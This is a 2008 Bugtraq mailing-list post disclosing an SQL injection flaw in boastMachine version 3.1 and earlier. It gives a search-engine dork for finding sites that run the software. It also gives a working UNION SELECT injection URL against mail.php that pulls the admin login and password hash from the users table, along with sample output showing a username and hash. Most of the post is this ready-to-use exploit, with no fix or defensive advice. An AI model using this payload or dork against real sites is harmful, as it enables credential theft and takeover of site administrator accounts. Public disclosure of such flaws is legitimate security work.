[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080121095715.27590.qmail@securityfocus.com>
Date: 21 Jan 2008 09:57:15 -0000
From: hadihadi_zedehal_2006@...oo.com
To: bugtraq@...urityfocus.com
Subject: boastMachine <=3.1 SQL Injection Vulnerbility
########################################################################
# #
# ...:::::boastMachine <=3.1 SQL Injection Vulnerbility ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: Powered by boastMachine v3.1
-----------------------------------
vuln:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=[blog_id]
example:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
-------------------------------------
you can see somting simillar to:
Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend
#############
'swagger' is admin user & 'e74c7cc56d033d32b8cb465c2bbc379b' is encoded admin password ;)
-------------------------------------
mybe other versions are Vulnerbil too :)
Powered by blists - more mailing lists